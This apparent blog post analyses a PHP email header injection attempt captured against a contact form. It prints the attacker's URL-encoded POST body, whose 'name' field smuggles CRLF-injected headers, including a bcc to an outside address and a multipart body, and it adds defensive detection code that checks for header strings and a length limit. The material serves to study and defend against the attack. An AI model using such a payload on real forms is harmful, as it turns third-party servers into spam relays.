Thursday, August 09, 2007
Sample PHP Email Injection from a real Attacker
This posting has been in my drafts for over a year. It's really interesting to see how PHP mail injection is done in the wild. Hopefully Michael doesn't mind me posting details - if he does it's not a problem since I'm sure he doesn't read these posts. :)
---------------------------------------------------------------------------
Here is a PHP email injection attempt captured "in the wild". This attack was against the same script that was exploited in PHP Email Injection Step by Step.
The attack wasn't successful for two reasons. First, mod_security was used to block certain tell-tale signs of PHP email injection. Second, the script limits the "name" field to a reasonable length, which this attempt exceeded.
---------------------------------------------------------------------------
text=stood8261%40spree.mnin.org&
email=stood8261%40spree.mnin.org&
Submit=stood8261%40spree.mnin.org&
name=him%0D%0AContent-Type%3A+multipart%2Fmixed%3B+boundary%3D3cde64db239a99d3c03a2b3399a85a90%0AMIME-Version%3A+1.0%0ASubject%3A+to+himsilf%2C+a+habit+iv+dog%0Abcc%3A+charleses3229%40aol.com%0A%0AThis+is+a+multi-part+message+in+MIME+format.%0A%0A--3cde64db239a99d3c03a2b3399a85a90%0AContent-Type%3A+text%2Fplain%3B+charset%3D%22us-ascii%22%0AMIME-Version%3A+1.0%0AContent-Transfer-Encoding%3A+7bit%0A%0Amay+remember+at+tto+s+visit%0A--3cde64db239a99d3c03a2b3399a85a90--%0A%0D%0A.%0D%0A
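The two checks that stopped this attempt (tell-tale header strings in a form field, and a length limit on "name") can be expressed as detection logic over the request body. This is an added example, not code from the original post, the script it discusses, or mod_security's rule set; the function name, the 64-character limit, the list of header names and the sample request body are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

MAX_NAME_LEN = 64  # assumed limit; the post only says the limit is "reasonable"
# Header names that have no business inside a form field (the "tell-tale signs").
HEADER_RE = re.compile(
    r"(?im)^\s*(content-type|mime-version|content-transfer-encoding|"
    r"subject|to|cc|bcc)\s*:")

# Constructed request body shaped like the captured one (placeholder addresses).
SAMPLE_BODY = (
    "text=probe%40example.org&email=probe%40example.org&"
    "name=him%0D%0AContent-Type%3A+multipart%2Fmixed%3B+boundary%3Dabc123"
    "%0AMIME-Version%3A+1.0%0ASubject%3A+test%0Abcc%3A+victim%40example.net"
    "%0A%0Abody+text%0A--abc123--%0A%0D%0A.%0D%0A"
)

def inspect_form(body, header_fields=("name", "email")):
    """Return {field: [reasons]} for fields that must not reach mail headers."""
    findings = {}
    for field, value in parse_qsl(body, keep_blank_values=True):
        if field not in header_fields:
            continue  # free-text fields may legitimately contain newlines
        reasons = []
        if "\r" in value or "\n" in value:
            reasons.append("CR/LF in header field")
        hits = sorted({m.group(1).lower() for m in HEADER_RE.finditer(value)})
        if hits:
            reasons.append("embedded headers: " + ", ".join(hits))
        if field == "name" and len(value) > MAX_NAME_LEN:
            reasons.append(f"name longer than {MAX_NAME_LEN} chars")
        if reasons:
            findings[field] = reasons
    return findings

if __name__ == "__main__":
    for field, reasons in inspect_form(SAMPLE_BODY).items():
        print(field, "->", "; ".join(reasons))
```

Any non-empty result means the request should be rejected before the field value is placed in a mail header.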
Labels: php mail injection
Comments:
Found your blog while searching for a tool/script that lets me test for injection vulnerabilities.
I'm not a PHP coder. I pay freelancers to do things, but do not have the knowledge to test their work. Until the ISP shuts down my website for spamming via insecure form.
You had some code there. How could I use that to test a script on a local server?
